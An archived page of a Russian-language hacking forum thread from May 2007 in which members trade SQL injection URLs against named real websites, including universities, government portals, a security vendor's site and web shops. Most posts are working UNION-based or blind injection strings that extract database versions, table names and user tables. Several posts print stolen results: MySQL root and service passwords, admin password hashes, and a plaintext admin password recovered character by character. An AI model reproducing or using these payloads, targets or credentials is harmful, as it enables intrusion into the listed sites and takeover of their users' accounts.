SQL Инъекции [Архив] - Страница 10

maxster

21.05.2007, 22:13

Вот набралось !

http://www.bengaldens.com/detail_all.php?id=-11+UNION+SELECT+1,2,VERSION(),4,5,6,7,USER(),9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,4 4,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60, 61,62,63,64,65/*
http://www.smdailyjournal.com/article_preview.php?id=-11+UNION+SELECT+1,2,VERSION(),USER(),5,DATABASE(), 7,8,9,10,11,12,13,14/*
http://www.wilsonelectronics.com/ViewProduct.php?ID=-111+UNION+SELECT+1,2,3,4,USER(),6,7,8,9,10,11,12,1 3,14,15,16,17,18/*
http://www.transbuddha.com/mediaHolder.php?id=-11+UNION+SELECT+VERSION(),2,3,4,5,6,7/*
http://www.numberonecarsupermarket.co.uk/car.php?id=-111+UNION+SELECT+1,2,3,4,5,6,7,8,9,10/*

ESET.bg

http://www.eset.bg/main.php?id=38&virusID=-111+UNION+SELECT+1,2,3,4,5,6,7,8/*

USER() : root

MySQL password:

root:44d3e5527af27974
debian-sys-maint:3c795ac1761bf029
hordemgr:wEb_pas
phpbb:bBn0D
dspam:!dsmaP0
linkos:l1nkn0d
phpnod:fn0dpHp
phpbb2:fn0dbB
smfnod:fn0dsM
root:wEb_pas
otrs:wEb_pas

Grey

22.05.2007, 12:33

http://www.guzhelya.com/news.php?n=-1+union+select+1,concat(database(),char(58),user() ,char(58),version()),3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26/*

Constantine

22.05.2007, 17:08

//несколько скулей от меня//

Sysnet.it
http://www.sysnet.it/system/news-dettaglio-system.php?id=-
21+union+select+1,2,version(),4,5,6,7,8,9,10,11,12 ,13,concat(user(),char(58),database()),15,16/*

Gayleague.com
http://www.gayleague.com/studio/fanfic/intro.php?id=-22+union+select+1,version(),3,database(),5,6,7,8,9 ,10/*

[53x]Shadow

22.05.2007, 22:59

HARVARD
www.researchmatters.harvard.edu

http://www.researchmatters.harvard.edu/story.php?article_id=-1+union+select+convert(concat(version(),char(58),u ser(),char(58),database()),char),2,3,4,5,6,7,8,9,1 0,11,12,13/*

Scipio

23.05.2007, 01:17

Их служба и опасна и трудна и на первый взгляд как будьто не видна
http://02.ru/news/index.php?id_tn=5&podr=1&id_n=-553%20union%20select%201,2,3,4,5,6,7/*

l1ght

23.05.2007, 09:25

Их служба и опасна и трудна и на первый взгляд как будьто не видна
http://02.ru/news/index.php?id_tn=5&podr=1&id_n=-553%20union%20select%201,2,3,4,5,6,7/*
=)))) Всех излечит, исцелит Добрый доктор Айболит!
http://www.03.ru/ill/ill_show.shtml?action=detail&ID=-1+union+select+1,2,concat(user(),0x3a,version(),0x 3a,database()),4,5,6/*

Grey

23.05.2007, 10:33

http://www.zagran.kiev.ua/article.php?new=195&idart=-1+union+select+1,2,3,4,5,6,7,version(),9,10,11,12, 13,14,15/*
http://www.zagran.kiev.ua/article.php?new=195&idart=-1+union+select+1,2,3,4,5,6,7,concat(username,char( 58),user_password),9,10,11,12,13,14,15+from+phpbb_ users+limit+1,1/*

Серенький

24.05.2007, 01:20

Милан Чемпион!!!
http://www.acmilanfan.ru/guestbook.php?section=1+and+1=0+union+select+1,2,3 ,concat_ws(0x3a,user(),version(),database()),5,6/*

x.Elf

24.05.2007, 10:00

http://kinosalut.ru/movie.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*

Boccob

24.05.2007, 16:04

Некий рыцарский замок
http://alterego.tut.by/library/showarticle.php?id=65+union+select+1,version(),3,4 ,5,6/*

XenOtai

24.05.2007, 17:49

http://www.mephi1996.ru/news.php?id=-1+union+select+1,2,3,4,5,6/*

_GaLs_

24.05.2007, 17:50

http://wgeo.ru/table.shtml?id=-3+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6/*
http://www.molitvoslov.com/txt.php?id=-3+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7/*
http://www.proriv.com/research/?id=-3+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9,0/*
http://illuminations.nctm.org/ActivityDetail.aspx?ID=-3'
Количество сталбцов не подобрал=(

Кто подберёт буду оч. признатетен)

Boccob

24.05.2007, 18:00

http://www.medilinkwm.co.uk/events/display.php?id=-1509+union+select+1,version(),3,4,5,6,7,8,9,10,11, 12,13,14,15

x.Elf

24.05.2007, 23:05

http://www.u-mama.ru/board/razdel.php?id=-1'
чето я не смог подобрать кол-во строк - если кто подберет ,плиз киньте в
255302219(ася) то что вышло

x.Elf

24.05.2007, 23:22

http://www.school-199.ur.ru/photo.php?aid=-1+union+select+1,2,3,4,5,6,7,8/*

школьный сайт :),прихватил случайно...

Dagon

24.05.2007, 23:33

_http://www.ssw.uga.edu

пользователи:
http://www.ssw.uga.edu/social/index.php?TabID=-1%20UNION%20SELECT%201,22222222,concat(username,pa ssword),244,23+from+users/*

Administrator 5624c1f033768afceffe44f1c59298d0493d253e

форма логина тут http://www.ssw.uga.edu/cgi-bin/webmanage/web_login.pl

содержимое mysql.user
http://www.ssw.uga.edu/social/index.php?TabID=-1%20UNION%20SELECT%201,22222222,concat(user,passwo rd),244,23+from+mysql.user/*

http://outcomes.web.arizona.edu/data.php?uid=19%20UNION%20SELECT%2012,3,777,VERSIO N(),777/*

Grey

25.05.2007, 00:03

http://www.inter-buket.ru/new-year/composition/?saleID=-1+union+select+1,2,3,4,concat(database(),char(58), user(),char(58),version()),6,7,8/*

http://www.inter-buket.ru/new-year/composition/?saleID=-1+union+select+1,2,3,4,concat(login,char(58),passw ord,char(58),email,char(58),tel,char(58),name,char (58),family),6,7,8+from+users+limit+0,1/*

Пароли не зашифрованы.

Muhacir

25.05.2007, 00:16

http://maximumradio.ru/
http://maximumradio.ru/?news=75765432%20union%20select%200,version(),2,3, user()/*

V.I.P

25.05.2007, 09:36

Жертва: www.scouts.ru(Центральный Сервер
Скаутов-разведчиков)

SQL: http://www.scouts.ru/modules/events/event.php?id=47999999+union+select+1,2,3,4,5,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 ,26,27,28,29,30--

version(): 5.0.26-standard
user(): orur@localhost
database() :xoops

Таблиц: 589
http://www.scouts.ru/modules/events/event.php?id=479999999999+union+select+1,2,3,4,5,t able_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25,26,27,28,29,30+from+information_sche ma.tables+limit+589,1--

Основные:xoops_users

Количество юзеров:1096
Извлечение:
Mail: name: pass(хеш).

http://www.scouts.ru/modules/events/event.php?id=479999999999+union+select+1,2,3,4,5,c oncat_ws(char(58),email,name,pass),7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30+from+xoops_users+limit+1096,1--

-=lebed=-

25.05.2007, 12:32

www.atam.gov.tr

_http://www.atam.gov.tr/index.php?Page=DergiIcerik&IcerikNo=-1+union+select+1,version(),3,4,user()/*

Таблица: DergiIcerik
Поля: No,TRBaslik,TRYazar,TRDergiSayi,TRIcerik

P.S. Есть там ещё таблицы?

l1ght

25.05.2007, 12:43

сдесь был байан!
domainsdb! привет, lol nax :) (кто смотрел видео)
http://www.mconline.ru/common/rateit/opinion_new.asp?code_opinion=ORT116046'--&code_rate=RRT175481
похоже mconline в одной базе с хакерру =)
//ps
http://www.xakep.ru/magazine/xA/088/056/2.asp

Boccob

25.05.2007, 12:47

Белорусский интерактивный веб-сайт для молодежи по проблеме ВИЧ/СПИД
http://www.aids.by/news_det.php?id=-1+union+select+1,2,concat(version(),0x3a,user(),0x 3a,database()),4,5,6,7/*

Boccob

25.05.2007, 13:37

Сайт о КПК, ноутбуках и мобилах
http://www.pda.by/catalog.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,co ncat(version(),0x3a,database(),0x3a,user())/*

MrSmith

25.05.2007, 17:37

Я тоже попробую: _http://collectablekids.com.au/shop/products/index.php?id=9999999999999'+union+select+1,2,3,4,v ersion(),6,7,8,9/*

Ky3bMu4

25.05.2007, 17:55

.edu

http://www.gse.upenn.edu/cms/cms.php?id=-263+union+select+1,2,3,4,version(),6/*
http://www.nhia.edu/news.php?id=-13+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24/*

Остальное:

http://www.dec-edu.com/detail_news.php?news=-33+union+select+version()/* (см. заголовок страницы)
http://www.rdu.org.ua/news.php?path=arc&subpath=main&content=-1044981924+union+select+1,version(),3,4/*

Не смог подобрать столбцы:

http://www.intergu.ru/pedsov/index.asp?main=answer&id_sec=-60+union+select+1,2/*
http://ruspoisk.ru/?type=7&s=54&city=-337+union+select+1,2,3,4,5,6,7,8,9/*
http://www.networkdoc.ru/news/news.php?id=-342+union+select+1/*
http://www.mpn.ru/my_news.php?number=8&id=-1+union+select+1,2,3/*
http://www.pskovedu.ru/?session=&project_id=-93+union+select+1,2,3/*

На этот раз всё проверил :)

Boccob

25.05.2007, 18:10

Информационный свадебный центр
http://www.swadba.by/show.php?id=-1+union+select+1,2,concat(user(),0x3a,version(),0x 3a,database()),4,5,6,7,8,9,10,11,12,13,14/*

Grey

25.05.2007, 19:06

http://legalru.ru/document.php?id=-1+union+select+1,concat(database(),char(58),user() ,char(58),version()),3,4,5/*

Boccob

25.05.2007, 19:22

Антиимпериализм))
http://www.anti-imperialism.net/lai/texte.php?langue=3&section=BY&id=-1+union+select+1,2,3,4,5,6,concat(user(),0x3a,vers ion(),0x3a,database()),8/*

_Pantera_

26.05.2007, 00:34

http://www.worldbrand.pl/index.php?id=-1+union+select+1,2,3,concat(login,char(58),pass),5 ,6+from+worldbrand.users+limit+0,1/*

NighSh

26.05.2007, 00:39

http://sonyericsson-club.ru/news/phone-9999+union+select+1,2,3,44,concat(user(),0x3a,vers ion(),0x3a,database()),6.html

Поля не смог подобрать... если кто подберет отпишите. Просто интересно стоит оно того или нет ) А то это моя первая скуля тут )))

Muhacir

26.05.2007, 02:27

http://schwein.ru
http://schwein.ru/news/index.php?page=single&rec=-1%20union%20select%200,version(),user(),3,database (),5/*

[53x]Shadow

26.05.2007, 03:40

Arizona State University
www.asu.edu
http://knowledge.wpcarey.asu.edu/index.cfm?fa=viewCat&CID=-1+or+1=(select+system_user)--
user: asu_user
db_name: ASU_DB
version: Microsoft SQL Server 2005 - 9.00.3159.00
Таблица и столбцы вываливаются в ошибке

V.I.P

26.05.2007, 09:11

http://www.lzsafety.gov.cn/news-print.php?id='

http://www.lzsafety.gov.cn/news-print.php?id='+union+select+table_name,2,3,4+from+ information_schema.tables+limit+107,1/*

http://www.lzsafety.gov.cn/news-print.php?id='+union+select+column_name,2,3,4+from +information_schema.columns/*

http://www.lzsafety.gov.cn/news-print.php?id='+union+select+concat(user,char(58),p ass),2,3,4+from+admin/*

root:*FA450863BE8C1DF3DCCE22B20EB630A7A55CCA39

Ky3bMu4

26.05.2007, 12:50

Партия .edu

http://gopanthers.fit.edu/sports_info/view.php?id=-11+union+select+1,2,3,4/*
http://www.montana.edu/cpa/news/nwview.php?article=-4862+union+select+1,version(),3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19
,20,21,22,23/*

Не подобрал:

http://bchs.uh.edu/news.php?news=-68+union+select+1/*
http://www.metropolitan.edu/news/newsdetail.php?id=-231+union+select+1,2,3,4/*
http://www.umtri.umich.edu/news.php?id=1455+union+select+1,2,3/*
http://www.mlml.calstate.edu/news/newsdetail.php?nid=-34+union+select+1,2,3,4,5,6,7,8,9/*

KPOT_f!nd

26.05.2007, 13:10

http://www.taksa-shop.ru/index.php?id=-1+union+select+1,password+from+users/*
limit в помощью. Ответ от БД сморим в теги <title></title>

Muhacir

26.05.2007, 14:04

http://www.lada-auto.ru
Type: Oracle
http://www.lada-auto.ru/cgi-bin/news.pl?id=-1'

Muhacir

26.05.2007, 14:31

gov.tr
http://www.karabuk.gov.tr/giris/haber.php?id=582345678&kategori=-1'

http://www.casgem.gov.tr/duyuru.php?uid=-13245'%20union%20select%200,user(),version(),datab ase(),4/*&view=1
uname : casgemuser2@localhost
db: casgemdb2
ver: 4.1.20

[53x]Shadow

26.05.2007, 18:22

to Кузьмич
http://www.metropolitan.edu/news/newsdetail.php?id=-231+union+select+1,2,3,4/*
Третья версия mysql по-этому и нет union, надо перебором фигачить ;)

http://www.mlml.calstate.edu/news/newsdetail.php?nid=-34+union+select+1,2,3,4,5,6,7/*
Здесь 7 столбцов, 5 принтабельный смотри в title;)

Ky3bMu4

26.05.2007, 19:55

Вот ещё .edu

http://rpitv.union.rpi.edu/news.php?newsid=-5+union+select+version(),2,3,4/*
http://gopanthers.fit.edu/sports_info/view.php?id=-11+union+select+1,2,3,4/*

Constantine

26.05.2007, 20:35

Показал бы хоть что умеешь выводить =\
http://gopanthers.fit.edu/sports_info/view.php?id=-11+union+select+1,2,convert(concat_ws(char(58),use r(),version(),database()+using+latin1),4/*

Серенький

26.05.2007, 22:09

http://www.shale.ru/page.php?lev1=-7+union+select+1,2,3,4,5,concat_ws(0x3a,user_id,us ername,user_password,user_email),7,8,9,0+from+phpb b_users/*
9000+ записей

XenOtai

27.05.2007, 15:39

http://www.olympus.ru/customers/manuals/'-1+union+select+1,2,3/*

Серенький

27.05.2007, 16:00

http://www.olympus.ru/customers/manuals/'-1+union+select+1,2,3/*
=>
http://hlamidnik.h18.ru/SQLS.html

Ky3bMu4

27.05.2007, 17:03

Блин, .edu уже кажись кончаются! :D :D :D
http://www.leiden.edu/students/index.php3?c=-46+union+select+version()/*

NOmeR1

27.05.2007, 17:16

:) первая моя нормальная скуля ))
http://www.autoteatr.ru/catalog.php?id=-2494+union+select+1,VERSION(),3,4,5,6,7,8,9,10,11, 12,13/*
http://www.autoteatr.ru/catalog.php?id=-2494+union+select+1,USER(),3,4,5,6,7,8,9,10,11,12, 13/*
http://www.autoteatr.ru/catalog.php?id=-2494+union+select+1,DATABASE(),3,4,5,6,7,8,9,10,11 ,12,13/*

Токо я больше ничего сделать не смог :)))

Scipio

27.05.2007, 17:17

вот инъекция на icq.com, но использовать ее не получится, т.к. там стоит ограничение на количество знаков, но факт в том, что инъекция есть
http://www.icq.com/boards/view_posts.php?uin=261634063-1

Серенький

27.05.2007, 17:55

первая моя нормальная скуля ))
Цитата:http://www.autoteatr.ru/catalog.php?id=-2494+union+select+1,VERSION(),3,4,5,6,7,8,9,10,11, 12,13/*
http://www.autoteatr.ru/catalog.php?id=-2494+union+select+1,USER(),3,4,5,6,7,8,9,10,11,12, 13/*
http://www.autoteatr.ru/catalog.php?id=-2494+union+select+1,DATABASE(),3,4,5,6,7,8,9,10,11 ,12,13/*

Токо я больше ничего сделать не смог ))

NOmeR1, гляди :)

есть таблицы: user_list (login,pwd,email,admin)
http://www.autoteatr.ru/catalog.php?id=-2494+union+select+1,concat_ws(0x3a,login,pwd,email ,admin),3,4,5,6,7,8,9,10,11,12,13+from+user_list+l imit+0,1/*

причем пароли открытые)

phpbb_users со всеми вытекающими.. (username,user_password и т.д.)
http://www.autoteatr.ru/catalog.php?id=-2494+union+select+1,concat_ws(0x3a,user_id,usernam e,user_password,user_email),3,4,5,6,7,8,9,10,11,12 ,13+from+phpbb_users+limit+1,1/*

зы. ищи внимательней ;)

Boccob

27.05.2007, 18:01

Сайт по сути большая доска объявлений о продаже автомобилей:
http://avtomarket.by/showtransdetail.php?id=9999+union+select+1,concat( user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*

blackybr

27.05.2007, 18:07

5 минут гугла
http://www.michiganbusiness.us/showcompany.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,database(),44,45,4 6,47,48,49,50,51/*
http://haytom.us/showarticle.php?id=-1+union+select+1,2,3,4,5
http://www.fairelections.us/article.php?id=-1+union+select+1,2,3,4,version()/*
http://www.ci.bremerton.wa.us/navigation.php?id=-1'+union+select+1,2,convert(version()+using+latin1 ),4,5,6,7,8,9,10,11,12,13,14/*
http://www.trumansburg.ny.us/org_detail.php?id=43+and+(ascii(substring(user(),1 ,1))%3E0)/*
http://www.conwayschools.afsc.k12.ar.us/parents.php?id=-1+union+select+1,convert(table_name+using+latin7), 3,4+from+information_schema.tables
http://www.gwhs.denver.k12.co.us/newsstory.php?id=22+and+(ascii(substring(user(),1, 1))%3E0)/*

Grey

27.05.2007, 18:42

http://bla-bla-bla.ru/borrow/?s=-1+union+select+1,2,3,4,convert(concat(database(),c har(58),user(),char(58),version()),char),6,7,8,9,1 0,11,12,13/*

Ky3bMu4

27.05.2007, 19:11

Фуф. Вот ещё 1 .edu и 1 .net

http://bgkulinar.net/news.php?&newsid=-1358+union+select+version()/*
http://colab.hunter.cuny.edu/colabcms/event_info.php?eventID=-18+union+select+1,2,3,4,5,6,7,version(),9,10,11,12 ,13/*

_Pantera_

27.05.2007, 19:16

http://iwf.ru/main/top.php?id=-2+union+select+1,2,concat(username,char(58),passwo rd),4+from+users+where+user_id=1/*

Boccob

27.05.2007, 19:25

Парк активного отдыха "Якутские горы"
http://www.yago.by/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,concat(user(),0x3 a,database(),0x3a,version()),11,12/*&show=8

з.ы. антибоян кто-нибудь обновляет вообще??

Constantine

27.05.2007, 19:31

Антибоян обновляеться раз в 14 дней

Заодно несколько иньекций
http://www.ardi.ee/lanordia/index.php?id=-10+union+select+1,concat(login,char(58),password)+ from+users/*

http://www.ivek.ee/news/news.php?mode=normal&id=-127+union+select+1,concat(login,char(58),password) ,3,4+from+users/*&lang=est

zl0ba

28.05.2007, 00:40

TOP 10 [SQL INJ] edu! for KPOT_f1nd

http://www.chemistry.montana.edu/news.php?id=19+union+select+1,2,3,4,5,6,7/*

http://www.grid.iu.edu/news/news.php?id=-68+union+select+1,2,concat(user(),char(58),version ()),4,5,6,7,8/*

http://www.gsb.iastate.edu/projectsissues/news.php?id=-12+union+select+1,2,3,4,5/*

http://www2.umaine.edu/graduate/news.php?id=19'+union+select+1,concat(user(),char( 58),version()),3,4/*

http://www.nhia.edu/news.php?id=-13+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24/*

http://www.physics.hmc.edu/news.php?id=21+union+select+1,2,3,4,5/*

http://www.csun.edu/~humndean/cgi-bin/news.php?id=-118+union+select+1,2,concat(user(),char(58),versio n()),4,5/*

http://acd.edu/news.php?id=5'+union+select+1,2,3,4,5/*

http://www.informatics.indiana.edu/news/news.asp?id=-156+union+select+1,concat(user(),char(58),version( )),3,4,5,6/*

http://www.bellarmine.edu/athletics/news.asp?id=1 or 1=@@version--

KPOT_f!nd

28.05.2007, 00:45

http://live.ece.utexas.edu/People/people_detail.php?id=-97+union+select+1,database(),3,version(),password, user,7,user(),9,10,11,12+from+mysql.user/*
root:327cc28f2c9db092
me lost :[

Joker-jar

28.05.2007, 03:18

http://ru-board.com/new/categories.php?op=newindex&catid=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11/*
Вывода нет. Возможно, в каком то поле хранится ссылка на файл со статьей...
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring(version(),1,1)) )=0x34/*
MySQL 4.x

Joker-jar

28.05.2007, 04:33

Вот немного покопался глубже:

http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+name+fr om+nuke_authors+where+radminsuper=1+limit+1),1,1)) )=103/*
g
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+name+fr om+nuke_authors+where+radminsuper=1+limit+1),2,1)) )=111/*
o
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+name+fr om+nuke_authors+where+radminsuper=1+limit+1),3,1)) )=100/*
d
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+name+fr om+nuke_authors+where+radminsuper=1+limit+1),4,1)) )=0/*

user: god

http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+pwd+fro m+nuke_authors+where+radminsuper=1+limit+1),1,1))) =102/*
f
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+pwd+fro m+nuke_authors+where+radminsuper=1+limit+1),2,1))) =114/*
r
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+pwd+fro m+nuke_authors+where+radminsuper=1+limit+1),3,1))) =101/*
e
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+pwd+fro m+nuke_authors+where+radminsuper=1+limit+1),4,1))) =52/*
4
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+pwd+fro m+nuke_authors+where+radminsuper=1+limit+1),5,1))) =53/*
5
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+pwd+fro m+nuke_authors+where+radminsuper=1+limit+1),6,1))) =116/*
t
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+pwd+fro m+nuke_authors+where+radminsuper=1+limit+1),7,1))) =114/*
r
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+pwd+fro m+nuke_authors+where+radminsuper=1+limit+1),8,1))) =115/*
s
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+pwd+fro m+nuke_authors+where+radminsuper=1+limit+1),9,1))) =119/*
w
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+pwd+fro m+nuke_authors+where+radminsuper=1+limit+1),10,1)) )=51/*
3
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+pwd+fro m+nuke_authors+where+radminsuper=1+limit+1),11,1)) )=0/*

password: fre45trsw3

-=lebed=-

28.05.2007, 11:32

http://www.eepublishers.co.za/view.php?sid=-8036+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32/*

Boccob

28.05.2007, 13:23

Pharmacheutical company
http://www.medochemie.com/products.php?by=category&id=-1+union+select+1,concat(user(),0x3a,version(),0x3a ,database()),3,4,5/*

-=megahertz=-

28.05.2007, 14:00

Ky3bMu4

28.05.2007, 14:07

.edu кончились...

http://www.acconcept.ru/news/news.php?id=-124+union+select+1,version(),3,4,5,6,7,8/*
http://romanykultury.info/news/news.php?row=-333+union+select+1,version(),3,4,5/*
http://www.hrd.ru/news.php?act=news_by_id&news_id=-283+union+select+1,2,3,4,version(),6,7/*
http://www.cews.org/cews/news.php?aid=-384+union+select+1,version()/* наводим курсор на кнопочку "1" в правом верхнем углу

Scipio

28.05.2007, 14:19

Поля подобрал
http://www.eepublishers.co.za/view.php?sid=-8036+union+select+null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null/*
помогите вывести user u password

круто ты их подобрал... научи как это делается? :)

а если серьезно, с полями ковыряться не охота, но там таблицы с префиксом ee_, например есть таблица ee_users... да и еще следи за кодировкой...

Cond

28.05.2007, 14:36

http://moneyru.com/kat/show.php?tema=-1+union+select+1,2,3,4,5,6,7,8,9,10,version(),12,1 3,14,15,16,17,18/*
С таблицой проблема может есть скрипт который бы брутил таблицы например вводишь http://moneyru.com/kat/show.php?tema=-1+union+select+1,2,3,4,5,6,7,8,9,10,version(),12,1 3,14,15,16,17,18 а скрипт дописывал бы +from+здесь_имена_таблиц/* и подбирал из текстового файла каждую строчку (таблицу) и выводил потом те таблицы в которых нет слова Warning или по другому отсеивание делать, например есть цифра от 1 до 50.
Программа SQL Injection TooL не помогла например ввожу туда http://moneyru.com/kat/show.php?tema=1
пробовал и http://moneyru.com/kat/show.php?tema=-1
ввёл сам кол-во полей (18) и выводимые написал что 11. Потом нажимаю брут таблиц она вывела все таблицы что есть в текстовом файле (.
Может есть нормальный рабочий скрипт чтобы только таблицы перебирал?

Constantine

28.05.2007, 14:44

http://www.belt-wrestling.org/ru/fed.php?id=-9999+union+select+1,concat_ws(0x3a,user(),database (),version()),3,4,5,6,7,8,9,10,11,12/*
=///

Grey

28.05.2007, 14:49

http://www.magweb.ru/one_news.php?news_id=99999999999999+union+select+1 ,2,3,4,5,concat(database(),char(58),user(),char(58 ),version()),7,8,9/*

160 таблиц:

http://www.magweb.ru/one_news.php?news_id=99999999999999+union+select+1 ,2,3,4,5,table_name,7,8,9+from+information_schema. tables+limit+160,1/*

----------------------------

phpads_config:

http://www.magweb.ru/one_news.php?news_id=99999999999999+union+select+1 ,2,3,4,5,concat(admin,char(58),admin_pw,char(58),a dmin_fullname,char(58),admin_email,char(58),admin_ email_headers,char(58),admin_novice),7,8,9+from+ph pads_config/*

phpads - система управления банерами.

root:d8f67c1080703334f221abe74fd4a0f1

А вот самой админки не нашел.

----------------------------

mw_members:

http://www.magweb.ru/one_news.php?news_id=99999999999999+union+select+1 ,2,3,4,5,concat(name,char(58),password,char(58),de scription),7,8,9+from+mw_members+limit+0,1/*

maglord:a5253ca029930561dce315f35e1741fb

Scipio

28.05.2007, 14:53

А вот самой админки не нашел.

http://www.magweb.ru/adm/

2Cond...

ты на SQL Injection TooL не гони... если сам не можешь пользовать прогу, а остольные могут, то виноват в этом только ты...

в поле URL введи:
http://moneyru.com/kat/show.php?tema=4

в поле string введи:
<b>Каталог - Ресурсы Webmoney</b>

и все у тебя найдется и не надо самому там ниче выставлять

XTErner

28.05.2007, 15:25

cherkasy.ukrtelecom.ua
http://www.cherkasy.ukrtelecom.ua/ua/hot_news/?id=-1188+union+select+null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null--
таблицы почемуто не выводятся=\
http://www.lviv.ukrtelecom.ua/ua/hot_news/?id=-2025+union+select+null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null--
анологично!

NOmeR1

28.05.2007, 15:39

:) Я понял, в чём прикол..
http://www.law.pitt.edu/feed/rss2.php?blog=research&catid=-28+union+select+1,USER(),3,4,5,6,7,8,9,10,11,12,13 ,14,15/*
http://www.law.pitt.edu/feed/rss2.php?blog=research&catid=-28+union+select+1,VERSION(),3,4,5,6,7,8,9,10,11,12 ,13,14,15/*
http://www.law.pitt.edu/feed/rss2.php?blog=research&catid=-28+union+select+1,DATABASE(),3,4,5,6,7,8,9,10,11,1 2,13,14,15/*
Пароль от ROOT (хеш)
http://www.law.pitt.edu/feed/rss2.php?blog=research&catid=-28+union+select+1,user,password,4,5,6,7,8,9,10,11, 12,13,14,15+from+mysql.user/*

Boccob

28.05.2007, 15:42

Магазин радиоуправляемых моделей
http://www.hobbycenter.by/news.php?id=-31+union+select+1,2,3,version(),5,6/*

NOmeR1

28.05.2007, 15:54

http://goliath.cs.ucla.edu/tagger/body.php?urlID=-30996+union+select+USER()/*
http://goliath.cs.ucla.edu/tagger/body.php?urlID=-30996+union+select+VERSION()/*
http://goliath.cs.ucla.edu/tagger/body.php?urlID=-30996+union+select+DATABASE()/*

Пароль от ROOT (хеш)
http://goliath.cs.ucla.edu/tagger/body.php?urlID=-30996+union+select+user+from+mysql.user/*
http://goliath.cs.ucla.edu/tagger/body.php?urlID=-30996+union+select+password+from+mysql.user/*

Boccob

28.05.2007, 15:59

Книжный интернет-магазин
http://autokniga.ab-daily.by/showmisc.php?id=-15+union+select+1,2,3,concat(version(),0x3a,user() ,0x3a,database()),5/*

NOmeR1

28.05.2007, 16:08

http://envirohealth.law.pitt.edu/blog.php?mid=25&blog_id=-7+union+select+1,USER(),3,4,5,6/*
http://envirohealth.law.pitt.edu/blog.php?mid=25&blog_id=-7+union+select+1,VERSION(),3,4,5,6/*
http://envirohealth.law.pitt.edu/blog.php?mid=25&blog_id=-7+union+select+1,DATABASE(),3,4,5,6/*
Больше ничего не смог сделать.

Boccob

28.05.2007, 16:25

Какой-то интернет-магазин
http://www.mobi.by/fax.php?id=-4+union+select+1,2,version(),4,5,6,7,8,9,10,11,12, 13,14,15,16/*

Ky3bMu4

28.05.2007, 22:40

Вот ещё:

http://www.venezuelanalysis.com/news.php?newsno=-2291+union+select+version()/*
http://www.maconintel.com/news.php?article=-179+union+select+1,2,3,version(),5,6,7,8,9/*
http://www.respectcoalition.org/2006/news.php?ite=-1274+union+select+version(),2,3,4/*

_Pantera_

29.05.2007, 08:40

http://oncoplastic.ru/hospital.php?id=-2+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat( id,char(58),email),0x78),0x78),4,5,6+from+admin/*
http://www.happyland.ru/brands.php?id=-2+union+select+1,version(),3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25/*
http://www.centresh.ru/article.php?id=-2+union+select+1,AES_DECRYPT(AES_ENCRYPT(version() ,0x78),0x78),3,4,5,6,7/*
http://vpiter.ru/page.php?id=-2+union+select+1,2,3,4,version(),6,7,8/*
